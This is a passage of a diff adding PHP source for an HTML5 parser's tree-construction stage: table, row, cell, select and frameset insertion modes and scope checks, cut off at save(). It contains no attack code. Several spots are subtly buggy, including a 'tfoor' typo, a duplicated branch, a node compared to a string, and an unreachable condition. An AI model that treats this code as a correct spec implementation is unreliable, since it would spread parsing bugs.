the current node is a table, tbody, tfoot, thead, or tr + element, then, whenever a node would be inserted into the current + node, it must instead be inserted into the foster parent element. */ + if(in_array(end($this->stack)->nodeName, + array('table', 'tbody', 'tfoot', 'thead', 'tr'))) { + /* The foster parent element is the parent element of the last + table element in the stack of open elements, if there is a + table element and it has such a parent element. If there is no + table element in the stack of open elements (innerHTML case), + then the foster parent element is the first element in the + stack of open elements (the html element). Otherwise, if there + is a table element in the stack of open elements, but the last + table element in the stack of open elements has no parent, or + its parent node is not an element, then the foster parent + element is the element before the last table element in the + stack of open elements. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === 'table') { + $table = $this->stack[$n]; + break; + } + } + + if(isset($table) && $table->parentNode !== null) { + $this->foster_parent = $table->parentNode; + + } elseif(!isset($table)) { + $this->foster_parent = $this->stack[0]; + + } elseif(isset($table) && ($table->parentNode === null || + $table->parentNode->nodeType !== XML_ELEMENT_NODE)) { + $this->foster_parent = $this->stack[$n - 1]; + } + } + + $this->inBody($token); + } + } + + private function inCaption($token) { + /* An end tag whose tag name is "caption" */ + if($token['type'] === HTML5::ENDTAG && $token['name'] === 'caption') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore + + /* Otherwise: */ + } else { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* Now, if the current node is not a caption element, then this + is a parse error. */ + // w/e + + /* Pop elements from this stack until a caption element has + been popped from the stack. */ + while(true) { + $node = end($this->stack)->nodeName; + array_pop($this->stack); + + if($node === 'caption') { + break; + } + } + + /* Clear the list of active formatting elements up to the last + marker. */ + $this->clearTheActiveFormattingElementsUpToTheLastMarker(); + + /* Switch the insertion mode to "in table". */ + $this->mode = self::IN_TABLE; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "td", "tfoot", "th", "thead", "tr", or an end tag whose tag + name is "table" */ + } elseif(($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'td', 'tfoot', 'th', + 'thead', 'tr'))) || ($token['type'] === HTML5::ENDTAG && + $token['name'] === 'table')) { + /* Parse error. Act as if an end tag with the tag name "caption" + had been seen, then, if that token wasn't ignored, reprocess the + current token. */ + $this->inCaption(array( + 'name' => 'caption', + 'type' => HTML5::ENDTAG + )); + + return $this->inTable($token); + + /* An end tag whose tag name is one of: "body", "col", "colgroup", + "html", "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'col', 'colgroup', 'html', 'tbody', 'tfoot', 'th', + 'thead', 'tr'))) { + // Parse error. Ignore the token. + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in body". */ + $this->inBody($token); + } + } + + private function inColumnGroup($token) { + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $text = $this->dom->createTextNode($token['data']); + end($this->stack)->appendChild($text); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + end($this->stack)->appendChild($comment); + + /* A start tag whose tag name is "col" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'col') { + /* Insert a col element for the token. Immediately pop the current + node off the stack of open elements. */ + $this->insertElement($token); + array_pop($this->stack); + + /* An end tag whose tag name is "colgroup" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'colgroup') { + /* If the current node is the root html element, then this is a + parse error, ignore the token. (innerHTML case) */ + if(end($this->stack)->nodeName === 'html') { + // Ignore + + /* Otherwise, pop the current node (which will be a colgroup + element) from the stack of open elements. Switch the insertion + mode to "in table". */ + } else { + array_pop($this->stack); + $this->mode = self::IN_TABLE; + } + + /* An end tag whose tag name is "col" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'col') { + /* Parse error. Ignore the token. */ + + /* Anything else */ + } else { + /* Act as if an end tag with the tag name "colgroup" had been seen, + and then, if that token wasn't ignored, reprocess the current token. */ + $this->inColumnGroup(array( + 'name' => 'colgroup', + 'type' => HTML5::ENDTAG + )); + + return $this->inTable($token); + } + } + + private function inTableBody($token) { + $clear = array('tbody', 'tfoot', 'thead', 'html'); + + /* A start tag whose tag name is "tr" */ + if($token['type'] === HTML5::STARTTAG && $token['name'] === 'tr') { + /* Clear the stack back to a table body context. */ + $this->clearStackToTableContext($clear); + + /* Insert a tr element for the token, then switch the insertion + mode to "in row". */ + $this->insertElement($token); + $this->mode = self::IN_ROW; + + /* A start tag whose tag name is one of: "th", "td" */ + } elseif($token['type'] === HTML5::STARTTAG && + ($token['name'] === 'th' || $token['name'] === 'td')) { + /* Parse error. Act as if a start tag with the tag name "tr" had + been seen, then reprocess the current token. */ + $this->inTableBody(array( + 'name' => 'tr', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inRow($token); + + /* An end tag whose tag name is one of: "tbody", "tfoot", "thead" */ + } elseif($token['type'] === HTML5::ENDTAG && + in_array($token['name'], array('tbody', 'tfoot', 'thead'))) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore + + /* Otherwise: */ + } else { + /* Clear the stack back to a table body context. */ + $this->clearStackToTableContext($clear); + + /* Pop the current node from the stack of open elements. Switch + the insertion mode to "in table". */ + array_pop($this->stack); + $this->mode = self::IN_TABLE; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "tfoot", "thead", or an end tag whose tag name is "table" */ + } elseif(($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'tfoor', 'thead'))) || + ($token['type'] === HTML5::STARTTAG && $token['name'] === 'table')) { + /* If the stack of open elements does not have a tbody, thead, or + tfoot element in table scope, this is a parse error. Ignore the + token. (innerHTML case) */ + if(!$this->elementInScope(array('tbody', 'thead', 'tfoot'), true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Clear the stack back to a table body context. */ + $this->clearStackToTableContext($clear); + + /* Act as if an end tag with the same tag name as the current + node ("tbody", "tfoot", or "thead") had been seen, then + reprocess the current token. */ + $this->inTableBody(array( + 'name' => end($this->stack)->nodeName, + 'type' => HTML5::ENDTAG + )); + + return $this->mainPhase($token); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html", "td", "th", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html', 'td', 'th', 'tr'))) { + /* Parse error. Ignore the token. */ + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in table". */ + $this->inTable($token); + } + } + + private function inRow($token) { + $clear = array('tr', 'html'); + + /* A start tag whose tag name is one of: "th", "td" */ + if($token['type'] === HTML5::STARTTAG && + ($token['name'] === 'th' || $token['name'] === 'td')) { + /* Clear the stack back to a table row context. */ + $this->clearStackToTableContext($clear); + + /* Insert an HTML element for the token, then switch the insertion + mode to "in cell". */ + $this->insertElement($token); + $this->mode = self::IN_CELL; + + /* Insert a marker at the end of the list of active formatting + elements. */ + $this->a_formatting[] = self::MARKER; + + /* An end tag whose tag name is "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'tr') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Clear the stack back to a table row context. */ + $this->clearStackToTableContext($clear); + + /* Pop the current node (which will be a tr element) from the + stack of open elements. Switch the insertion mode to "in table + body". */ + array_pop($this->stack); + $this->mode = self::IN_TBODY; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "tfoot", "thead", "tr" or an end tag whose tag name is "table" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'tfoot', 'thead', 'tr'))) { + /* Act as if an end tag with the tag name "tr" had been seen, then, + if that token wasn't ignored, reprocess the current token. */ + $this->inRow(array( + 'name' => 'tr', + 'type' => HTML5::ENDTAG + )); + + return $this->inCell($token); + + /* An end tag whose tag name is one of: "tbody", "tfoot", "thead" */ + } elseif($token['type'] === HTML5::ENDTAG && + in_array($token['name'], array('tbody', 'tfoot', 'thead'))) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Otherwise, act as if an end tag with the tag name "tr" had + been seen, then reprocess the current token. */ + $this->inRow(array( + 'name' => 'tr', + 'type' => HTML5::ENDTAG + )); + + return $this->inCell($token); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html", "td", "th" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html', 'td', 'th', 'tr'))) { + /* Parse error. Ignore the token. */ + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in table". */ + $this->inTable($token); + } + } + + private function inCell($token) { + /* An end tag whose tag name is one of: "td", "th" */ + if($token['type'] === HTML5::ENDTAG && + ($token['name'] === 'td' || $token['name'] === 'th')) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as that of the token, then this is a + parse error and the token must be ignored. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Generate implied end tags, except for elements with the same + tag name as the token. */ + $this->generateImpliedEndTags(array($token['name'])); + + /* Now, if the current node is not an element with the same tag + name as the token, then this is a parse error. */ + // k + + /* Pop elements from this stack until an element with the same + tag name as the token has been popped from the stack. */ + while(true) { + $node = end($this->stack)->nodeName; + array_pop($this->stack); + + if($node === $token['name']) { + break; + } + } + + /* Clear the list of active formatting elements up to the last + marker. */ + $this->clearTheActiveFormattingElementsUpToTheLastMarker(); + + /* Switch the insertion mode to "in row". (The current node + will be a tr element at this point.) */ + $this->mode = self::IN_ROW; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'td', 'tfoot', 'th', + 'thead', 'tr'))) { + /* If the stack of open elements does not have a td or th element + in table scope, then this is a parse error; ignore the token. + (innerHTML case) */ + if(!$this->elementInScope(array('td', 'th'), true)) { + // Ignore. + + /* Otherwise, close the cell (see below) and reprocess the current + token. */ + } else { + $this->closeCell(); + return $this->inRow($token); + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'td', 'tfoot', 'th', + 'thead', 'tr'))) { + /* If the stack of open elements does not have a td or th element + in table scope, then this is a parse error; ignore the token. + (innerHTML case) */ + if(!$this->elementInScope(array('td', 'th'), true)) { + // Ignore. + + /* Otherwise, close the cell (see below) and reprocess the current + token. */ + } else { + $this->closeCell(); + return $this->inRow($token); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html'))) { + /* Parse error. Ignore the token. */ + + /* An end tag whose tag name is one of: "table", "tbody", "tfoot", + "thead", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('table', 'tbody', 'tfoot', 'thead', 'tr'))) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as that of the token (which can only + happen for "tbody", "tfoot" and "thead", or, in the innerHTML case), + then this is a parse error and the token must be ignored. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise, close the cell (see below) and reprocess the current + token. */ + } else { + $this->closeCell(); + return $this->inRow($token); + } + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in body". */ + $this->inBody($token); + } + } + + private function inSelect($token) { + /* Handle the token as follows: */ + + /* A character token */ + if($token['type'] === HTML5::CHARACTR) { + /* Append the token's character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag token whose tag name is "option" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'option') { + /* If the current node is an option element, act as if an end tag + with the tag name "option" had been seen. */ + if(end($this->stack)->nodeName === 'option') { + $this->inSelect(array( + 'name' => 'option', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* A start tag token whose tag name is "optgroup" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'optgroup') { + /* If the current node is an option element, act as if an end tag + with the tag name "option" had been seen. */ + if(end($this->stack)->nodeName === 'option') { + $this->inSelect(array( + 'name' => 'option', + 'type' => HTML5::ENDTAG + )); + } + + /* If the current node is an optgroup element, act as if an end tag + with the tag name "optgroup" had been seen. */ + if(end($this->stack)->nodeName === 'optgroup') { + $this->inSelect(array( + 'name' => 'optgroup', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* An end tag token whose tag name is "optgroup" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'optgroup') { + /* First, if the current node is an option element, and the node + immediately before it in the stack of open elements is an optgroup + element, then act as if an end tag with the tag name "option" had + been seen. */ + $elements_in_stack = count($this->stack); + + if($this->stack[$elements_in_stack - 1]->nodeName === 'option' && + $this->stack[$elements_in_stack - 2]->nodeName === 'optgroup') { + $this->inSelect(array( + 'name' => 'option', + 'type' => HTML5::ENDTAG + )); + } + + /* If the current node is an optgroup element, then pop that node + from the stack of open elements. Otherwise, this is a parse error, + ignore the token. */ + if($this->stack[$elements_in_stack - 1] === 'optgroup') { + array_pop($this->stack); + } + + /* An end tag token whose tag name is "option" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'option') { + /* If the current node is an option element, then pop that node + from the stack of open elements. Otherwise, this is a parse error, + ignore the token. */ + if(end($this->stack)->nodeName === 'option') { + array_pop($this->stack); + } + + /* An end tag whose tag name is "select" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'select') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + // w/e + + /* Otherwise: */ + } else { + /* Pop elements from the stack of open elements until a select + element has been popped from the stack. */ + while(true) { + $current = end($this->stack)->nodeName; + array_pop($this->stack); + + if($current === 'select') { + break; + } + } + + /* Reset the insertion mode appropriately. */ + $this->resetInsertionMode(); + } + + /* A start tag whose tag name is "select" */ + } elseif($token['name'] === 'select' && + $token['type'] === HTML5::STARTTAG) { + /* Parse error. Act as if the token had been an end tag with the + tag name "select" instead. */ + $this->inSelect(array( + 'name' => 'select', + 'type' => HTML5::ENDTAG + )); + + /* An end tag whose tag name is one of: "caption", "table", "tbody", + "tfoot", "thead", "tr", "td", "th" */ + } elseif(in_array($token['name'], array('caption', 'table', 'tbody', + 'tfoot', 'thead', 'tr', 'td', 'th')) && $token['type'] === HTML5::ENDTAG) { + /* Parse error. */ + // w/e + + /* If the stack of open elements has an element in table scope with + the same tag name as that of the token, then act as if an end tag + with the tag name "select" had been seen, and reprocess the token. + Otherwise, ignore the token. */ + if($this->elementInScope($token['name'], true)) { + $this->inSelect(array( + 'name' => 'select', + 'type' => HTML5::ENDTAG + )); + + $this->mainPhase($token); + } + + /* Anything else */ + } else { + /* Parse error. Ignore the token. */ + } + } + + private function afterBody($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Process the token as it would be processed if the insertion mode + was "in body". */ + $this->inBody($token); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the first element in the stack of open + elements (the html element), with the data attribute set to the + data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + $this->stack[0]->appendChild($comment); + + /* An end tag with the tag name "html" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'html') { + /* If the parser was originally created in order to handle the + setting of an element's innerHTML attribute, this is a parse error; + ignore the token. (The element will be an html element in this + case.) (innerHTML case) */ + + /* Otherwise, switch to the trailing end phase. */ + $this->phase = self::END_PHASE; + + /* Anything else */ + } else { + /* Parse error. Set the insertion mode to "in body" and reprocess + the token. */ + $this->mode = self::IN_BODY; + return $this->inBody($token); + } + } + + private function inFrameset($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + U+000D CARRIAGE RETURN (CR), or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag with the tag name "frameset" */ + } elseif($token['name'] === 'frameset' && + $token['type'] === HTML5::STARTTAG) { + $this->insertElement($token); + + /* An end tag with the tag name "frameset" */ + } elseif($token['name'] === 'frameset' && + $token['type'] === HTML5::ENDTAG) { + /* If the current node is the root html element, then this is a + parse error; ignore the token. (innerHTML case) */ + if(end($this->stack)->nodeName === 'html') { + // Ignore + + } else { + /* Otherwise, pop the current node from the stack of open + elements. */ + array_pop($this->stack); + + /* If the parser was not originally created in order to handle + the setting of an element's innerHTML attribute (innerHTML case), + and the current node is no longer a frameset element, then change + the insertion mode to "after frameset". */ + $this->mode = self::AFTR_FRAME; + } + + /* A start tag with the tag name "frame" */ + } elseif($token['name'] === 'frame' && + $token['type'] === HTML5::STARTTAG) { + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Immediately pop the current node off the stack of open elements. */ + array_pop($this->stack); + + /* A start tag with the tag name "noframes" */ + } elseif($token['name'] === 'noframes' && + $token['type'] === HTML5::STARTTAG) { + /* Process the token as if the insertion mode had been "in body". */ + $this->inBody($token); + + /* Anything else */ + } else { + /* Parse error. Ignore the token. */ + } + } + + private function afterFrameset($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + U+000D CARRIAGE RETURN (CR), or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* An end tag with the tag name "html" */ + } elseif($token['name'] === 'html' && + $token['type'] === HTML5::ENDTAG) { + /* Switch to the trailing end phase. */ + $this->phase = self::END_PHASE; + + /* A start tag with the tag name "noframes" */ + } elseif($token['name'] === 'noframes' && + $token['type'] === HTML5::STARTTAG) { + /* Process the token as if the insertion mode had been "in body". */ + $this->inBody($token); + + /* Anything else */ + } else { + /* Parse error. Ignore the token. */ + } + } + + private function trailingEndPhase($token) { + /* After the main phase, as each token is emitted from the tokenisation + stage, it must be processed as described in this section. */ + + /* A DOCTYPE token */ + if($token['type'] === HTML5::DOCTYPE) { + // Parse error. Ignore the token. + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the Document object with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + $this->dom->appendChild($comment); + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + } elseif($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Process the token as it would be processed in the main phase. */ + $this->mainPhase($token); + + /* A character token that is not one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE. Or a start tag token. Or an end tag token. */ + } elseif(($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) || + $token['type'] === HTML5::STARTTAG || $token['type'] === HTML5::ENDTAG) { + /* Parse error. Switch back to the main phase and reprocess the + token. */ + $this->phase = self::MAIN_PHASE; + return $this->mainPhase($token); + + /* An end-of-file token */ + } elseif($token['type'] === HTML5::EOF) { + /* OMG DONE!! */ + } + } + + private function insertElement($token, $append = true) { + $el = $this->dom->createElement($token['name']); + + foreach($token['attr'] as $attr) { + if(!$el->hasAttribute($attr['name'])) { + $el->setAttribute($attr['name'], $attr['value']); + } + } + + $this->appendToRealParent($el); + $this->stack[] = $el; + + return $el; + } + + private function insertText($data) { + $text = $this->dom->createTextNode($data); + $this->appendToRealParent($text); + } + + private function insertComment($data) { + $comment = $this->dom->createComment($data); + $this->appendToRealParent($comment); + } + + private function appendToRealParent($node) { + if($this->foster_parent === null) { + end($this->stack)->appendChild($node); + + } elseif($this->foster_parent !== null) { + /* If the foster parent element is the parent element of the + last table element in the stack of open elements, then the new + node must be inserted immediately before the last table element + in the stack of open elements in the foster parent element; + otherwise, the new node must be appended to the foster parent + element. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === 'table' && + $this->stack[$n]->parentNode !== null) { + $table = $this->stack[$n]; + break; + } + } + + if(isset($table) && $this->foster_parent->isSameNode($table->parentNode)) + $this->foster_parent->insertBefore($node, $table); + else + $this->foster_parent->appendChild($node); + + $this->foster_parent = null; + } + } + + private function elementInScope($el, $table = false) { + if(is_array($el)) { + foreach($el as $element) { + if($this->elementInScope($element, $table)) { + return true; + } + } + + return false; + } + + $leng = count($this->stack); + + for($n = 0; $n < $leng; $n++) { + /* 1. Initialise node to be the current node (the bottommost node of + the stack). */ + $node = $this->stack[$leng - 1 - $n]; + + if($node->tagName === $el) { + /* 2. If node is the target node, terminate in a match state. */ + return true; + + } elseif($node->tagName === 'table') { + /* 3. Otherwise, if node is a table element, terminate in a failure + state. */ + return false; + + } elseif($table === true && in_array($node->tagName, array('caption', 'td', + 'th', 'button', 'marquee', 'object'))) { + /* 4. Otherwise, if the algorithm is the "has an element in scope" + variant (rather than the "has an element in table scope" variant), + and node is one of the following, terminate in a failure state. */ + return false; + + } elseif($node === $node->ownerDocument->documentElement) { + /* 5. Otherwise, if node is an html element (root element), terminate + in a failure state. (This can only happen if the node is the topmost + node of the stack of open elements, and prevents the next step from + being invoked if there are no more elements in the stack.) */ + return false; + } + + /* Otherwise, set node to the previous entry in the stack of open + elements and return to step 2. (This will never fail, since the loop + will always terminate in the previous step if the top of the stack + is reached.) */ + } + } + + private function reconstructActiveFormattingElements() { + /* 1. If there are no entries in the list of active formatting elements, + then there is nothing to reconstruct; stop this algorithm. */ + $formatting_elements = count($this->a_formatting); + + if($formatting_elements === 0) { + return false; + } + + /* 3. Let entry be the last (most recently added) element in the list + of active formatting elements. */ + $entry = end($this->a_formatting); + + /* 2. If the last (most recently added) entry in the list of active + formatting elements is a marker, or if it is an element that is in the + stack of open elements, then there is nothing to reconstruct; stop this + algorithm. */ + if($entry === self::MARKER || in_array($entry, $this->stack, true)) { + return false; + } + + for($a = $formatting_elements - 1; $a >= 0; true) { + /* 4. If there are no entries before entry in the list of active + formatting elements, then jump to step 8. */ + if($a === 0) { + $step_seven = false; + break; + } + + /* 5. Let entry be the entry one earlier than entry in the list of + active formatting elements. */ + $a--; + $entry = $this->a_formatting[$a]; + + /* 6. If entry is neither a marker nor an element that is also in + thetack of open elements, go to step 4. */ + if($entry === self::MARKER || in_array($entry, $this->stack, true)) { + break; + } + } + + while(true) { + /* 7. Let entry be the element one later than entry in the list of + active formatting elements. */ + if(isset($step_seven) && $step_seven === true) { + $a++; + $entry = $this->a_formatting[$a]; + } + + /* 8. Perform a shallow clone of the element entry to obtain clone. */ + $clone = $entry->cloneNode(); + + /* 9. Append clone to the current node and push it onto the stack + of open elements so that it is the new current node. */ + end($this->stack)->appendChild($clone); + $this->stack[] = $clone; + + /* 10. Replace the entry for entry in the list with an entry for + clone. */ + $this->a_formatting[$a] = $clone; + + /* 11. If the entry for clone in the list of active formatting + elements is not the last entry in the list, return to step 7. */ + if(end($this->a_formatting) !== $clone) { + $step_seven = true; + } else { + break; + } + } + } + + private function clearTheActiveFormattingElementsUpToTheLastMarker() { + /* When the steps below require the UA to clear the list of active + formatting elements up to the last marker, the UA must perform the + following steps: */ + + while(true) { + /* 1. Let entry be the last (most recently added) entry in the list + of active formatting elements. */ + $entry = end($this->a_formatting); + + /* 2. Remove entry from the list of active formatting elements. */ + array_pop($this->a_formatting); + + /* 3. If entry was a marker, then stop the algorithm at this point. + The list has been cleared up to the last marker. */ + if($entry === self::MARKER) { + break; + } + } + } + + private function generateImpliedEndTags(array $exclude = array()) { + /* When the steps below require the UA to generate implied end tags, + then, if the current node is a dd element, a dt element, an li element, + a p element, a td element, a th element, or a tr element, the UA must + act as if an end tag with the respective tag name had been seen and + then generate implied end tags again. */ + $node = end($this->stack); + $elements = array_diff(array('dd', 'dt', 'li', 'p', 'td', 'th', 'tr'), $exclude); + + while(in_array(end($this->stack)->nodeName, $elements)) { + array_pop($this->stack); + } + } + + private function getElementCategory($name) { + if(in_array($name, $this->special)) + return self::SPECIAL; + + elseif(in_array($name, $this->scoping)) + return self::SCOPING; + + elseif(in_array($name, $this->formatting)) + return self::FORMATTING; + + else + return self::PHRASING; + } + + private function clearStackToTableContext($elements) { + /* When the steps above require the UA to clear the stack back to a + table context, it means that the UA must, while the current node is not + a table element or an html element, pop elements from the stack of open + elements. If this causes any elements to be popped from the stack, then + this is a parse error. */ + while(true) { + $node = end($this->stack)->nodeName; + + if(in_array($node, $elements)) { + break; + } else { + array_pop($this->stack); + } + } + } + + private function resetInsertionMode() { + /* 1. Let last be false. */ + $last = false; + $leng = count($this->stack); + + for($n = $leng - 1; $n >= 0; $n--) { + /* 2. Let node be the last node in the stack of open elements. */ + $node = $this->stack[$n]; + + /* 3. If node is the first node in the stack of open elements, then + set last to true. If the element whose innerHTML attribute is being + set is neither a td element nor a th element, then set node to the + element whose innerHTML attribute is being set. (innerHTML case) */ + if($this->stack[0]->isSameNode($node)) { + $last = true; + } + + /* 4. If node is a select element, then switch the insertion mode to + "in select" and abort these steps. (innerHTML case) */ + if($node->nodeName === 'select') { + $this->mode = self::IN_SELECT; + break; + + /* 5. If node is a td or th element, then switch the insertion mode + to "in cell" and abort these steps. */ + } elseif($node->nodeName === 'td' || $node->nodeName === 'th') { + $this->mode = self::IN_CELL; + break; + + /* 6. If node is a tr element, then switch the insertion mode to + "in row" and abort these steps. */ + } elseif($node->nodeName === 'tr') { + $this->mode = self::IN_ROW; + break; + + /* 7. If node is a tbody, thead, or tfoot element, then switch the + insertion mode to "in table body" and abort these steps. */ + } elseif(in_array($node->nodeName, array('tbody', 'thead', 'tfoot'))) { + $this->mode = self::IN_TBODY; + break; + + /* 8. If node is a caption element, then switch the insertion mode + to "in caption" and abort these steps. */ + } elseif($node->nodeName === 'caption') { + $this->mode = self::IN_CAPTION; + break; + + /* 9. If node is a colgroup element, then switch the insertion mode + to "in column group" and abort these steps. (innerHTML case) */ + } elseif($node->nodeName === 'colgroup') { + $this->mode = self::IN_CGROUP; + break; + + /* 10. If node is a table element, then switch the insertion mode + to "in table" and abort these steps. */ + } elseif($node->nodeName === 'table') { + $this->mode = self::IN_TABLE; + break; + + /* 11. If node is a head element, then switch the insertion mode + to "in body" ("in body"! not "in head"!) and abort these steps. + (innerHTML case) */ + } elseif($node->nodeName === 'head') { + $this->mode = self::IN_BODY; + break; + + /* 12. If node is a body element, then switch the insertion mode to + "in body" and abort these steps. */ + } elseif($node->nodeName === 'body') { + $this->mode = self::IN_BODY; + break; + + /* 13. If node is a frameset element, then switch the insertion + mode to "in frameset" and abort these steps. (innerHTML case) */ + } elseif($node->nodeName === 'frameset') { + $this->mode = self::IN_FRAME; + break; + + /* 14. If node is an html element, then: if the head element + pointer is null, switch the insertion mode to "before head", + otherwise, switch the insertion mode to "after head". In either + case, abort these steps. (innerHTML case) */ + } elseif($node->nodeName === 'html') { + $this->mode = ($this->head_pointer === null) + ? self::BEFOR_HEAD + : self::AFTER_HEAD; + + break; + + /* 15. If last is true, then set the insertion mode to "in body" + and abort these steps. (innerHTML case) */ + } elseif($last) { + $this->mode = self::IN_BODY; + break; + } + } + } + + private function closeCell() { + /* If the stack of open elements has a td or th element in table scope, + then act as if an end tag token with that tag name had been seen. */ + foreach(array('td', 'th') as $cell) { + if($this->elementInScope($cell, true)) { + $this->inCell(array( + 'name' => $cell, + 'type' => HTML5::ENDTAG + )); + + break; + } + } + } + + public function save() { + return 